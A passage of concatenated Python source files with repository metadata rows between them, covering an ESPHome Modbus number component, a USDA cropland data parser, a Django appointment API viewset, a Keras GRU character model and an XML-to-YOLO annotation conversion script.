CONF_SKIP_UPDATES,
CONF_USE_WRITE_MULTIPLE,
CONF_VALUE_TYPE,
CONF_WRITE_LAMBDA,
)
DEPENDENCIES = ["modbus_controller"]
CODEOWNERS = ["@martgras"]
ModbusNumber = modbus_controller_ns.class_(
"ModbusNumber", cg.Component, number.Number, SensorItem
)
def validate_min_max(config):
if config[CONF_MAX_VALUE] <= config[CONF_MIN_VALUE]:
raise cv.Invalid("max_value must be greater than min_value")
if config[CONF_MIN_VALUE] < -16777215:
raise cv.Invalid("max_value must be greater than -16777215")
if config[CONF_MAX_VALUE] > 16777215:
raise cv.Invalid("max_value must not be greater than 16777215")
return config
def validate_modbus_number(config):
if CONF_CUSTOM_COMMAND not in config and CONF_ADDRESS not in config:
raise cv.Invalid(
f" {CONF_ADDRESS} is a required property if '{CONF_CUSTOM_COMMAND}:' isn't used"
)
return config
CONFIG_SCHEMA = cv.All(
number.NUMBER_SCHEMA.extend(ModbusItemBaseSchema).extend(
{
cv.GenerateID(): cv.declare_id(ModbusNumber),
cv.Optional(CONF_REGISTER_TYPE, default="holding"): cv.enum(
MODBUS_WRITE_REGISTER_TYPE
),
cv.Optional(CONF_VALUE_TYPE, default="U_WORD"): cv.enum(SENSOR_VALUE_TYPE),
cv.Optional(CONF_WRITE_LAMBDA): cv.returning_lambda,
# 24 bits are the maximum value for fp32 before precison is lost
# 0x00FFFFFF = 16777215
cv.Optional(CONF_MAX_VALUE, default=16777215.0): cv.float_,
cv.Optional(CONF_MIN_VALUE, default=-16777215.0): cv.float_,
cv.Optional(CONF_STEP, default=1): cv.positive_float,
cv.Optional(CONF_MULTIPLY, default=1.0): cv.float_,
cv.Optional(CONF_USE_WRITE_MULTIPLE, default=False): cv.boolean,
}
),
validate_min_max,
validate_modbus_number,
)
async def to_code(config):
byte_offset, reg_count = modbus_calc_properties(config)
var = cg.new_Pvariable(
config[CONF_ID],
config[CONF_REGISTER_TYPE],
config[CONF_ADDRESS],
byte_offset,
config[CONF_BITMASK],
config[CONF_VALUE_TYPE],
reg_count,
config[CONF_SKIP_UPDATES],
config[CONF_FORCE_NEW_RANGE],
)
await cg.register_component(var, config)
await number.register_number(
var,
config,
min_value=config[CONF_MIN_VALUE],
max_value=config[CONF_MAX_VALUE],
step=config[CONF_STEP],
)
cg.add(var.set_write_multiply(config[CONF_MULTIPLY]))
parent = await cg.get_variable(config[CONF_MODBUS_CONTROLLER_ID])
cg.add(var.set_parent(parent))
cg.add(parent.add_sensor_item(var))
await add_modbus_base_properties(var, config, ModbusNumber)
cg.add(var.set_use_write_mutiple(config[CONF_USE_WRITE_MULTIPLE]))
if CONF_WRITE_LAMBDA in config:
template_ = await cg.process_lambda(
config[CONF_WRITE_LAMBDA],
[
(ModbusNumber.operator("ptr"), "item"),
(cg.float_, "x"),
(cg.std_vector.template(cg.uint16).operator("ref"), "payload"),
],
return_type=cg.optional.template(float),
)
cg.add(var.set_write_template(template_))
| 30.865079 | 92 | 0.674466 | 489 | 3,889 | 5.03681 | 0.259714 | 0.073082 | 0.045473 | 0.030857 | 0.139667 | 0.095818 | 0.086886 | 0.086886 | 0.065773 | 0 | 0 | 0.023458 | 0.232708 | 3,889 | 125 | 93 | 31.112 | 0.801944 | 0.021599 | 0 | 0.037383 | 0 | 0 | 0.070752 | 0.006312 | 0 | 0 | 0 | 0 | 0 | 1 | 0.018692 | false | 0 | 0.056075 | 0 | 0.093458 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
37ad7164ae63d5ffb588e864b6d5d0bdac217918 | 9,305 | py | Python | flowsa/USDA_CoA_Cropland.py | cchiq/flowsa | fc21e8da7c3ba66ca4ae4a0c72f568af7ef5e6c0 | [
"CC0-1.0"
] | null | null | null | flowsa/USDA_CoA_Cropland.py | cchiq/flowsa | fc21e8da7c3ba66ca4ae4a0c72f568af7ef5e6c0 | [
"CC0-1.0"
] | null | null | null | flowsa/USDA_CoA_Cropland.py | cchiq/flowsa | fc21e8da7c3ba66ca4ae4a0c72f568af7ef5e6c0 | [
"CC0-1.0"
] | null | null | null | # USDA_CoA_Cropland.py (flowsa)
# !/usr/bin/env python3
# coding=utf-8
import json
import numpy as np
import pandas as pd
from flowsa.common import *
def CoA_Cropland_URL_helper(build_url, config, args):
"""This helper function uses the "build_url" input from flowbyactivity.py, which is a base url for coa cropland data
that requires parts of the url text string to be replaced with info specific to the usda nass quickstats API.
This function does not parse the data, only modifies the urls from which data is obtained. """
# initiate url list for coa cropland data
urls = []
# call on state acronyms from common.py (and remove entry for DC)
state_abbrevs = abbrev_us_state
state_abbrevs = {k: v for (k, v) in state_abbrevs.items() if k != "DC"}
# replace "__aggLevel__" in build_url to create three urls
for x in config['agg_levels']:
for y in config['sector_levels']:
# at national level, remove the text string calling for state acronyms
if x == 'NATIONAL':
url = build_url
url = url.replace("__aggLevel__", x)
url = url.replace("__secLevel__", y)
url = url.replace("&state_alpha=__stateAlpha__", "")
if y == "ECONOMICS":
url = url.replace(
"AREA HARVESTED&statisticcat_desc=AREA IN PRODUCTION&statisticcat_desc=TOTAL&statisticcat_desc=AREA BEARING %26 NON-BEARING",
"AREA")
else:
url = url.replace("&commmodity_desc=AG LAND", "")
url = url.replace(" ", "%20")
urls.append(url)
else:
# substitute in state acronyms for state and county url calls
for z in state_abbrevs:
url = build_url
url = url.replace("__aggLevel__", x)
url = url.replace("__secLevel__", y)
url = url.replace("__stateAlpha__", z)
if y == "ECONOMICS":
url = url.replace(
"AREA HARVESTED&statisticcat_desc=AREA IN PRODUCTION&statisticcat_desc=TOTAL&statisticcat_desc=AREA BEARING %26 NON-BEARING",
"AREA")
else:
url = url.replace("&commmodity_desc=AG LAND", "")
url = url.replace(" ", "%20")
urls.append(url)
return urls
def coa_cropland_call(url, coa_response, args):
cropland_json = json.loads(coa_response.text)
df_cropland = pd.DataFrame(data=cropland_json["data"])
return df_cropland
def coa_cropland_parse(dataframe_list, args):
"""Modify the imported data so it meets the flowbyactivity criteria and only includes data on harvested acreage
(irrigated and total). Data is split into two parquets, one for acreage and the other for operations"""
df = pd.concat(dataframe_list, sort=True)
# specify desired data based on domain_desc
df = df[df['domain_desc'].isin(['AREA HARVESTED', 'AREA IN PRODUCTION', 'TOTAL', 'AREA BEARING & NON-BEARING', 'AREA'])]
# Many crops are listed as their own commodities as well as grouped within a broader category (for example, orange
# trees are also part of orchards). As this dta is not needed, takes up space, and can lead to double counting if
# included, want to drop these unused columns
# subset dataframe into the 5 crop types and drop rows
# crop totals: drop all data
# field crops: don't want certain commodities and don't want detailed types of wheat, cotton, or sunflower
df_fc = df[df['group_desc'] == 'FIELD CROPS']
df_fc = df_fc[~df_fc['commodity_desc'].isin(['GRASSES', 'GRASSES & LEGUMES, OTHER', 'LEGUMES', 'HAY', 'HAYLAGE'])]
df_fc = df_fc[~df_fc['class_desc'].str.contains('SPRING|WINTER|TRADITIONAL|OIL|PIMA|UPLAND', regex=True)]
# fruit and tree nuts: only want a few commodities
df_ftn = df[df['group_desc'] == 'FRUIT & TREE NUTS']
df_ftn = df_ftn[df_ftn['commodity_desc'].isin(['BERRY TOTALS', 'ORCHARDS'])]
df_ftn = df_ftn[df_ftn['class_desc'].isin(['ALL CLASSES'])]
# horticulture: only want a few commodities
df_h = df[df['group_desc'] == 'HORTICULTURE']
df_h = df_h[df_h['commodity_desc'].isin(['CUT CHRISTMAS TREES', 'SHORT TERM WOODY CROPS'])]
# vegetables: only want a few commodities
df_v = df[df['group_desc'] == 'VEGETABLES']
df_v = df_v[df_v['commodity_desc'].isin(['VEGETABLE TOTALS'])]
# only want ag land in farms & land & assets
df_fla = df[df['group_desc'] == 'FARMS & LAND & ASSETS']
df_fla = df_fla[df_fla['short_desc'].str.contains("AG LAND")]
# concat data frames
df = pd.concat([df_fc, df_ftn, df_h, df_v, df_fla])
# drop unused columns
df = df.drop(columns=['agg_level_desc', 'domain_desc', 'location_desc', 'state_alpha', 'sector_desc',
'country_code', 'begin_code', 'watershed_code', 'reference_period_desc',
'asd_desc', 'county_name', 'source_desc', 'congr_district_code', 'asd_code',
'week_ending', 'freq_desc', 'load_time', 'zip_5', 'watershed_desc', 'region_desc',
'state_ansi', 'state_name', 'country_name', 'county_ansi', 'end_code', 'group_desc'])
# create FIPS column by combining existing columns
df.loc[df['county_code'] == '', 'county_code'] = '000' # add county fips when missing
df['Location'] = df['state_fips_code'] + df['county_code']
df.loc[df['Location'] == '99000', 'Location'] = US_FIPS # modify national level fips
# use info from other columns to determine flow name
df['FlowName'] = np.where(df["unit_desc"] == 'OPERATIONS', df["unit_desc"], df['statisticcat_desc'])
# combine column information to create activity information, and create two new columns for activities
df['Activity'] = df['commodity_desc'] + ', ' + df['class_desc'] + ', ' + df['util_practice_desc'] # drop this column later
df['Activity'] = df['Activity'].str.replace(", ALL CLASSES", "", regex=True) # not interested in all data from class_desc
df['Activity'] = df['Activity'].str.replace(", ALL UTILIZATION PRACTICES", "", regex=True) # not interested in all data from class_desc
df['ActivityProducedBy'] = np.where(df["unit_desc"] == 'OPERATIONS', df["Activity"], 'None')
df['ActivityConsumedBy'] = np.where(df["unit_desc"] == 'ACRES', df["Activity"], 'None')
# add compartment based on values from other columns
df['Compartment'] = df['prodn_practice_desc'] + ', ' + df['domaincat_desc']
df['Compartment'] = df['Compartment'].str.replace("ALL PRODUCTION PRACTICES, ", "", regex=True)
df['Compartment'] = df['Compartment'].str.replace("IN THE OPEN, ", "", regex=True)
# rename columns to match flowbyactivity format
df = df.rename(columns={"Value": "FlowAmount", "unit_desc": "Unit",
"year": "Year", "CV (%)": "Spread",
"short_desc": "Description"})
# drop remaining unused columns
df = df.drop(columns=['Activity', 'class_desc', 'commodity_desc', 'state_fips_code', 'county_code',
'statisticcat_desc', 'prodn_practice_desc', 'domaincat_desc', 'util_practice_desc'])
# modify contents of units column
df.loc[df['Unit'] == 'OPERATIONS', 'Unit'] = 'p'
# modify contents of flowamount column, "D" is supressed data, "z" means less than half the unit is shown
df['FlowAmount'] = df['FlowAmount'].str.strip() # trim whitespace
df.loc[df['FlowAmount'] == "(D)", 'FlowAmount'] = withdrawn_keyword
df.loc[df['FlowAmount'] == "(Z)", 'FlowAmount'] = withdrawn_keyword
df['FlowAmount'] = df['FlowAmount'].str.replace(",", "", regex=True)
# USDA CoA 2017 states that (H) means CV >= 99.95, therefore replacing with 99.95 so can convert column to int
# (L) is a CV of <= 0.05
df['Spread'] = df['Spread'].str.strip() # trim whitespace
df.loc[df['Spread'] == "(H)", 'Spread'] = 99.95
df.loc[df['Spread'] == "(L)", 'Spread'] = 0.05
df.loc[df['Spread'] == "", 'Spread'] = None # for instances where data is missing
df.loc[df['Spread'] == "(D)", 'Spread'] = withdrawn_keyword
# drop Descriptions that contain certain phrases, as these data are included in other categories
df = df[~df['Description'].str.contains('FRESH MARKET|PROCESSING|ENTIRE CROP|NONE OF CROP|PART OF CROP')]
# drop Descriptions that contain certain phrases - only occur in AG LAND data
df = df[~df['Description'].str.contains('INSURANCE|OWNED|RENTED|FAILED|FALLOW|IDLE|WOODLAND')]
# add location system based on year of data
if args['year'] >= '2019':
df['LocationSystem'] = 'FIPS_2019'
elif '2015' <= args['year'] < '2019':
df['LocationSystem'] = 'FIPS_2015'
elif '2013' <= args['year'] < '2015':
df['LocationSystem'] = 'FIPS_2013'
elif '2010' <= args['year'] < '2013':
df['LocationSystem'] = 'FIPS_2010'
# Add hardcoded data
df['Class'] = np.where(df["Unit"] == 'ACRES', "Land", "Other")
df['SourceName'] = "USDA_CoA_Cropland"
df['MeasureofSpread'] = "RSD"
df['DataReliability'] = None
df['DataCollection'] = 2
return df
| 58.522013 | 153 | 0.629339 | 1,223 | 9,305 | 4.638594 | 0.29027 | 0.014807 | 0.027499 | 0.011458 | 0.242729 | 0.230742 | 0.142077 | 0.110347 | 0.110347 | 0.110347 | 0 | 0.012188 | 0.232886 | 9,305 | 158 | 154 | 58.892405 | 0.782572 | 0.284901 | 0 | 0.216981 | 0 | 0.018868 | 0.369268 | 0.051777 | 0 | 0 | 0 | 0 | 0 | 1 | 0.028302 | false | 0 | 0.037736 | 0 | 0.09434 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
37ae25cb640514b4b69d9fbcf3fe21ab2db9d1d8 | 4,762 | py | Python | chiron/apps/visits/views.py | vahidzee/chiron | 66115f935a65253ec9c8a7feabfb7db0842acb29 | [
"MIT"
] | null | null | null | chiron/apps/visits/views.py | vahidzee/chiron | 66115f935a65253ec9c8a7feabfb7db0842acb29 | [
"MIT"
] | null | null | null | chiron/apps/visits/views.py | vahidzee/chiron | 66115f935a65253ec9c8a7feabfb7db0842acb29 | [
"MIT"
] | null | null | null | from django.db import IntegrityError
from rest_framework.authentication import TokenAuthentication, SessionAuthentication
from rest_framework.response import Response
import django.shortcuts as shortcuts
from rest_framework import (
status,
viewsets,
serializers as drf_serializers,
permissions as drf_permissions,
mixins,
decorators,
)
from . import serializers, models
from django.contrib.auth import get_user_model
from django.db.models import Q
class AppointmentViewSet(
viewsets.GenericViewSet,
mixins.RetrieveModelMixin,
mixins.UpdateModelMixin,
mixins.ListModelMixin,
mixins.DestroyModelMixin,
mixins.CreateModelMixin,
):
"""
APIs for retrieving and managing appointments
**Permissions**:
- _Authentication_ is required
**Actions & Endpoints**:
* **General Lists** [[/appointment/](/appointment/)]:
* [`GET`]: lists all appointments for the currently logged-in user
* [`POST`]: create an appointment for the currently logged-in user
* **Specific Appointment Managements** [`/appointment/<appointment_id>/`]:
* **Retrieve** [`GET`]: retrieve details of the specific appointment (if owned by user)
* **Update** & **Delete** [`PUT`, `DELETE`]: Update/Remove the specific appointment (if owned by the currently logged-in user as its patient)
* **Visit Specific Actions**:
* **Approve** [`/appointment/<appointment_id>/approve/` | `POST`]: approve the specific appointment (if owned by the currently logged-in user as its doctor)
* **Reject** [`/appointment/<appointment_id>/reject/` | `POST`]: approve the specific appointment (if owned by the currently logged-in user as its doctor)
* **Visit** [`/appointment/<appointment_id>/visit/` | `GET`]: retireve contact info of doctor if appointment is approved (if appointment is owned by the currently logged-in user as its patient)
"""
queryset = models.Appointment.objects.all()
permission_classes = [drf_permissions.IsAuthenticated]
authentication_classes = [SessionAuthentication, TokenAuthentication]
def get_serializer_class(self):
if self.action in ["retrieve", "list", "delete"]:
return serializers.AppointmentSerializer
if self.action in ["create", "update"]:
return serializers.AppointmentDoctorSerializer
return drf_serializers.Serializer
def filter_queryset(self, queryset):
if self.action in ["list", "retrieve", "delete"]:
return queryset.filter(
Q(doctor=self.request.user) | Q(patient=self.request.user)
)
return queryset
def perform_create(self, serializer):
serializer.is_valid()
serializer.save(
patient=self.request.user,
doctor=shortcuts.get_object_or_404(
get_user_model(), username=serializer.validated_data["doctor"]
),
)
def perform_update(self, serializer):
self.perform_create(serializer)
def apply_approval(self, request, toggle, pk=None):
object = self.get_object()
if object.doctor == request.user:
object.approved = toggle
object.save()
return Response(status=status.HTTP_202_ACCEPTED)
return Response(status=status.HTTP_400_BAD_REQUEST)
@decorators.action(methods=["POST"], detail=True, name="Reject Appointments")
def reject(self, request, pk=None):
"""
Reject appointment
**Permissions**:
* _Authentication_ is required
* API only available to _Owner_ of the appointment (the doctor)
"""
return self.apply_approval(request=request, toggle=False, pk=pk)
@decorators.action(methods=["POST"], detail=True, name="Approve Appointments")
def approve(self, request, pk=None):
"""
Approve appointment
**Permissions**:
* _Authentication_ is required
* API only available to _Owner_ of the appointment (the doctor)
"""
return self.apply_approval(request=request, toggle=True, pk=pk)
@decorators.action(methods=["GET"], detail=True, name="Visit")
def visit(self, request, pk=None):
"""
Get the contact information for appointment
**Permissions**:
* _Authentication_ is required
* API only available to _Owner_ of the appointment (the patient)
"""
object = self.get_object()
if object.patient == request.user and object.approved:
return Response(
data=dict(phone_number=str(object.doctor.phone)),
status=status.HTTP_202_ACCEPTED,
)
return Response(status=status.HTTP_400_BAD_REQUEST)
| 37.203125 | 201 | 0.666107 | 512 | 4,762 | 6.082031 | 0.25 | 0.024727 | 0.034682 | 0.038536 | 0.331407 | 0.316956 | 0.272319 | 0.245986 | 0.245986 | 0.245986 | 0 | 0.004096 | 0.230995 | 4,762 | 127 | 202 | 37.496063 | 0.846259 | 0.337463 | 0 | 0.057143 | 0 | 0 | 0.036999 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.114286 | false | 0 | 0.114286 | 0 | 0.442857 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
37aec59f9b17b9d32ce9730876f6d8d46a79c1b0 | 478 | py | Python | 3-natural-language-processing/2-nlp-character-pred.py | MLStruckmann/tensorflow-templates | ca35a8f055929ee4ec552fa03737d808a0fe3491 | [
"MIT"
] | null | null | null | 3-natural-language-processing/2-nlp-character-pred.py | MLStruckmann/tensorflow-templates | ca35a8f055929ee4ec552fa03737d808a0fe3491 | [
"MIT"
] | null | null | null | 3-natural-language-processing/2-nlp-character-pred.py | MLStruckmann/tensorflow-templates | ca35a8f055929ee4ec552fa03737d808a0fe3491 | [
"MIT"
] | null | null | null | # Simple character prediction model (stateful)
model = keras.models.Sequential([
keras.layers.GRU(128, return_sequences=True, stateful=True,
dropout=0.2, recurrent_dropout=0.2,
batch_input_shape=[batch_size, None, max_id]),
keras.layers.GRU(128, return_sequences=True, stateful=True,
dropout=0.2, recurrent_dropout=0.2),
keras.layers.TimeDistributed(keras.layers.Dense(max_id,
activation="softmax"))
]) | 43.454545 | 62 | 0.669456 | 59 | 478 | 5.271186 | 0.491525 | 0.141479 | 0.115756 | 0.109325 | 0.482315 | 0.482315 | 0.482315 | 0.482315 | 0.482315 | 0.482315 | 0 | 0.037037 | 0.209205 | 478 | 11 | 63 | 43.454545 | 0.785714 | 0.09205 | 0 | 0.222222 | 0 | 0 | 0.016548 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
37b007b20e0af00196c2315cf92bfae9d58c871d | 12,681 | py | Python | data_format_scripts/makeDatasetTxt_4Points_fromCasper.py | TT-happy-work/keras-yolo3 | 92ed71769c1040a18cf18e88dab30bfaa16248f4 | [
"MIT"
] | null | null | null | data_format_scripts/makeDatasetTxt_4Points_fromCasper.py | TT-happy-work/keras-yolo3 | 92ed71769c1040a18cf18e88dab30bfaa16248f4 | [
"MIT"
] | null | null | null | data_format_scripts/makeDatasetTxt_4Points_fromCasper.py | TT-happy-work/keras-yolo3 | 92ed71769c1040a18cf18e88dab30bfaa16248f4 | [
"MIT"
] | null | null | null | import os
from xml.etree import ElementTree
from scipy.spatial import distance as dist
import numpy as np
from time import sleep
import cv2
from PIL import Image, ImageDraw
import colorsys
def order_points(ptsArr):
# pt_a, pt_b: out of the 2 left X, a is thr top one and b is the bottom.
# pt_c, pt_d: out of the 2 right X, c is the
## sort the points based on their x-coordinates
xSorted = ptsArr[np.argsort(ptsArr[:, 0]), :]
## grab the 2 left-most and the 2 right-most points from the sorted
## x-coodinate points
leftMost = xSorted[:2, :]
rightMost = xSorted[2:, :]
## now, sort the left-most coordinates according to their
## y-coordinates so we can grab the top-left and bottom-left
## points, respectively
leftMost = leftMost[np.argsort(leftMost[:, 1]), :]
(pt_a, pt_b) = leftMost
## now that we have the top-left coordinate, use it as an
## anchor to calculate the Euclidean distance between the
## top-left and right-most points; by the Pythagorean
## theorem, the point with the largest distance will be
## our bottom-right point
# D = dist.cdist(tl[np.newaxis], rightMost, "euclidean")[0]
# (br, tr) = rightMost[np.argsort(D)[::-1], :]
# the remaing two points are arranged
# so that pt_c is the lower of the two
rightMost = rightMost[np.argsort(rightMost[:, 1])[::-1], :]
(pt_c, pt_d) = rightMost
## return the coordinates in top-left, top-right,
## bottom-right, and bottom-left order
return np.array([pt_a, pt_b, pt_c, pt_d], dtype="float32")
if __name__ == '__main__':
## XML folder to convert to data text
mainDbFolder = '/home/tamar/DBs/Reccelite/All_data/Tagging3'
## class list file
labelsFile = '/home/tamar/DBs/Reccelite/All_data/class_names.txt' # extract labels dict from recce_names file
## Write contents of dictionary allImgs into recce_dataset.txt as required by k-means
fout = '/home/tamar/DBs/Reccelite/All_data/dataTxt_4points_Tagging3.txt'
## file to write annomalities into
annomalitiesFile = '/home/tamar/DBs/Reccelite/All_data/Annomalities_3.txt'
num_pts_per_tar = 4 #how many points per target to write to datatext
debug_prints = False
subFolderList = os.listdir(mainDbFolder)
allImgs = []; # list of Img-dictionaries. each dict is the complete info of an img.
annomal = []; # keep track of all sorts of problems
with open(labelsFile, 'r') as f:
labels = {}
for i, tar in enumerate(f):
labels[tar[:-1]] = i
for singleImg in subFolderList: # new Img
first_line_flag = True
singleImgAnnomalities = {}
annotationFile = os.path.join(mainDbFolder, singleImg, singleImg) + '.xml' # the name of the xml-file is similar to the name of the sub-folder
for file in os.listdir(os.path.join(mainDbFolder, singleImg)): # many of the xmls have shorter names
if file.endswith(".xml"):
os.rename(os.path.join(mainDbFolder, singleImg, file), annotationFile)
if os.path.isfile(os.path.join(mainDbFolder, singleImg, singleImg) + '.jpg'):
imgFilePath = os.path.join(mainDbFolder, singleImg, singleImg) + '.jpg'
elif os.path.isfile(os.path.join(mainDbFolder, singleImg, singleImg) + '.png'):
imgFilePath = os.path.join(mainDbFolder, singleImg, singleImg) + '.png'
else:
Exception('no image in dir')
if singleImg == 'XMLs' or not os.path.isfile(annotationFile):
singleImgAnnomalities['Img'] = imgFilePath
singleImgAnnomalities['Problem'] = 'No Annotations'
singleImgAnnomalities['tarID'] = 'ALL'
annomal.append(singleImgAnnomalities)
singleImgAnnomalities = {}
continue
singleImage_dict = {}
singleImage_dict['imagePath'] = imgFilePath
singleImage_dict['allTargetsInImg'] = []
allTargets = {}
f = open(annotationFile,'rt')
tree = ElementTree.parse(f)
root = tree.getroot()
for item in root.findall("./WorldPoints/WorldPoint"): # goes through each to collect all target-types with their ordinals
singleImgAnnomalities = {}
a = item.find('ID').text
b = item.find('Name').text
if debug_prints: print('type: ', a, b)
if not b: # invalid cls Type
singleImgAnnomalities['Img'] = imgFilePath
singleImgAnnomalities['tarID'] = a
singleImgAnnomalities['Problem'] = 'No Name Annotation'
annomal.append(singleImgAnnomalities)
singleImgAnnomalities = {}
continue
if b not in labels.keys(): # if this is a tarType not encountered before, add it to dict and to the labels_txt
if debug_prints: print('tarTYPE: ', b, 'Image:', imgFilePath)
labels[b] = max(labels.values())+1
with open(labelsFile, 'a+') as f:
f.write(b)
f.write('\n')
allTargets[item.find('ID').text] = item.find('Name').text # keys=IDs; values=tar-type
for item in root.findall("./Appearances/MarkedImage/SensorPointWorldPointPairs/SensorPointWorldPointPair"): # goes through each to collect all ordinal target types
pts = [];
if item.find("./First/Shape").text == 'PointPolygon':
coo_count=0;
for coo in item.findall("./First/Coordinate"):
if not coo_count: # first coo of pointpolygon is not relevant.
coo_count = 1
if debug_prints: print('before pop', tar_id)
if item.findall("./Second/WorldPointId")[0].text == tar_id: # if belongs to the Polygon that was before - eliminate the polygon.
singleImage_dict['allTargetsInImg'].pop() # get rid of the polygon the was before this pointpolygon, if same ID
continue
[pts.append(x.text) for x in coo.findall("./X")]
[pts.append(y.text) for y in coo.findall("./Y")]
coo_count+=1
if debug_prints: print('\nPointPolygon: ', tar_id, pts)
elif item.find("./First/Shape").text != 'Polygon': # Protection from non-polygon entries + keep track of problem
# if item.find("./First/Shape").text != 'Polygon': # Protection from non-polygon entries + keep track of problem
singleImgAnnomalities['Img'] = imgFilePath
singleImgAnnomalities['tarID'] = item.findall("./Second/WorldPointId")[0].text
singleImgAnnomalities['Problem'] = item.find("./First/Shape").text
annomal.append(singleImgAnnomalities)
singleImgAnnomalities = {}
continue
else:
# try:
# if item.find("./First/partially_hidden").text:
# continue
# except:
# pass
tar_id = item.findall("./Second/WorldPointId")[0].text
for coo in item.findall("./First/Coordinate"):
[pts.append(x.text) for x in coo.findall("./X")]
[pts.append(y.text) for y in coo.findall("./Y")]
if debug_prints: print('\nPolygon: ', tar_id, pts)
ptsArr = np.reshape(np.asarray(pts, dtype=np.float32), (int(len(pts)/2), 2))
# tl = np.array((np.min(ptsArr[:, 0]), np.min(ptsArr[:, 1])))
# br = np.array((np.max(ptsArr[:, 0]), np.max(ptsArr[:, 1])))
if ptsArr.shape[0] !=4:
if debug_prints: print(annotationFile, item.findall("./Second/WorldPointId")[0].text)
pt_a, pt_b, pt_c, pt_d = order_points(ptsArr) # in order to obtain x_min etc correctly
tar = {}
if item.findall("./Second/WorldPointId")[0].text not in allTargets.keys():
continue
tar['tarID'] = int(item.findall("./Second/WorldPointId")[0].text) # holds the ordinal index of tar
tar['tarClass'] = allTargets[item.findall("./Second/WorldPointId")[0].text]
tar['tarX_a'] = pt_a[0]
tar['tarY_a'] = pt_a[1]
tar['tarX_b'] = pt_b[0]
tar['tarY_b'] = pt_b[1]
tar['tarX_c'] = pt_c[0]
tar['tarY_c'] = pt_c[1]
tar['tarX_d'] = pt_d[0]
tar['tarY_d'] = pt_d[1]
singleImage_dict['allTargetsInImg'].append(tar)
allImgs.append(singleImage_dict)
f = open(fout, "w")
for imgIdx in range(len(allImgs)):
if first_line_flag:
f.write(allImgs[imgIdx]['imagePath'] + ' ') # write to file the image Name, after which will foloow all info of all tars in img.
else:
f.write('\n' + allImgs[imgIdx]['imagePath'] + ' ') # write to file the image Name, after which will foloow all info of all tars in img.
first_line_flag = False
img = Image.open(allImgs[imgIdx]['imagePath'])
draw = ImageDraw.Draw(img)
## draw settings
hsv_tuples = [(x / len(labels), 0.9, 1.0) for x in range(len(labels))]
colors = list(map(lambda x: colorsys.hsv_to_rgb(*x), hsv_tuples))
colors = list(map(lambda x: (int(x[0] * 255), int(x[1] * 255), int(x[2] * 255)), colors))
numOfTarsInImg = len(allImgs[imgIdx]['allTargetsInImg'])
imgShape = [cv2.imread(allImgs[imgIdx]['imagePath']).shape[0], cv2.imread(allImgs[imgIdx]['imagePath']).shape[1]]
showImg = []
for tar in range(numOfTarsInImg):
## DBG: To show only requested targets
#a = ['unknow', 'jeepprivate']
#if not any(x in allImgs[imgIdx]['allTargetsInImg'][tar]['tarClass'] for x in a):
#continue
# showImg.append(1)
## Write to data txt file
if allImgs[imgIdx]['allTargetsInImg'][tar]['tarClass'] == 'unknow':
continue
# f.write('#' + str(allImgs[imgIdx]['allTargetsInImg'][tar]['tarID']) + '#')
f.write(str(allImgs[imgIdx]['allTargetsInImg'][tar]['tarX_a']) + ',' + str(allImgs[imgIdx]['allTargetsInImg'][tar]['tarY_a']) + ',') # write the a coordinates
f.write(str(allImgs[imgIdx]['allTargetsInImg'][tar]['tarX_b']) + ',' + str(allImgs[imgIdx]['allTargetsInImg'][tar]['tarY_b']) + ',') # write the a coordinates
f.write(str(allImgs[imgIdx]['allTargetsInImg'][tar]['tarX_c']) + ',' + str(allImgs[imgIdx]['allTargetsInImg'][tar]['tarY_c']) + ',') # write the a coordinates
f.write(str(allImgs[imgIdx]['allTargetsInImg'][tar]['tarX_d']) + ',' + str(allImgs[imgIdx]['allTargetsInImg'][tar]['tarY_d']) + ',') # write the a coordinates
f.write(str(labels[allImgs[imgIdx]['allTargetsInImg'][tar]['tarClass']]) + ' ')
## Show the boxes on image
# bbox = np.array((allImgs[imgIdx]['allTargetsInImg'][tar]['tarX_a'], allImgs[imgIdx]['allTargetsInImg'][tar]['tarY_a'], allImgs[imgIdx]['allTargetsInImg'][tar]['tarX_b'], allImgs[imgIdx]['allTargetsInImg'][tar]['tarY_b'], allImgs[imgIdx]['allTargetsInImg'][tar]['tarX_c'], allImgs[imgIdx]['allTargetsInImg'][tar]['tarY_c'], allImgs[imgIdx]['allTargetsInImg'][tar]['tarX_d'], allImgs[imgIdx]['allTargetsInImg'][tar]['tarY_d']))
# tarText = allImgs[imgIdx]['allTargetsInImg'][tar]['tarClass']
## DBG: to search only for requested targets
#if not any(x in tarText for x in a):
#continue
# bbox_text = "%s" % tarText
# text_size = draw.textsize(bbox_text)
# bbox_reshaped = list(bbox.reshape(4, 2).reshape(-1))
# draw.rectangle(bbox_reshaped, outline=colors[labels[allImgs[imgIdx]['allTargetsInImg'][tar]['tarClass']]], width=3)
# text_origin = bbox_reshaped[:2] - np.array([0, text_size[1]])
# draw.rectangle([tuple(text_origin), tuple(text_origin + text_size)], fill=colors[labels[allImgs[imgIdx]['allTargetsInImg'][tar]['tarClass']]])
## draw bbox
# draw.text(tuple(text_origin), bbox_text, fill=(0, 0, 0))
## DBG: to show only images containing requested targets
# img.show()
# sleep(2)
# img.close()
f.close()
## Record in file the collected annomalities
annoF = open(annomalitiesFile, "w")
for ann in annomal:
